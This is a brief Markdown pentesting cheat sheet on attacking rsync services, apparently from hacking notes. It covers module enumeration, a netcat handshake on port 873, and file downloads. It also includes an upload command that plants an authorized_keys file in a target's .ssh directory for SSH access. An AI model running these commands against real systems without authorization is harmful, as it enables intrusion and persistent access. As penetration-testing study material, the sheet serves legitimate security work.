40 lines
745 B
Markdown
40 lines
745 B
Markdown
# rsync
|
|
|
|
* [netspi article]( https://www.netspi.com/blog/technical/network-penetration-testing/linux-hacking-case-studies-part-1-rsync/)
|
|
* [hacktricks' rsync](https://book.hacktricks.xyz/pentesting/873-pentesting-rsync)
|
|
|
|
## Enumerate
|
|
|
|
```sh
|
|
rsync <target-IP>::
|
|
rsync <target-IP>::files
|
|
rsync <target-IP>::files/foo/
|
|
```
|
|
### via netcat
|
|
* Another way is the following
|
|
```sh
|
|
nc -vn $TARGET_IP 873
|
|
```
|
|
* Repeat the identical handshake, e.g.
|
|
```
|
|
@RSYNCD: 31.0
|
|
```
|
|
* List all directories
|
|
```sh
|
|
#list
|
|
```
|
|
|
|
## Downloads
|
|
|
|
```sh
|
|
rsync <user>@<target-IP>::/files/foo/bar.txt .
|
|
rsync -r <user>@<target-IP>::/files/foo .
|
|
```
|
|
|
|
## Uploads
|
|
|
|
```sh
|
|
rsync authorized_keys <user>@<target-IP>::/files/foo/.ssh/
|
|
rsync -r documents <user>@<target-IP>::/files/foo/
|
|
```
|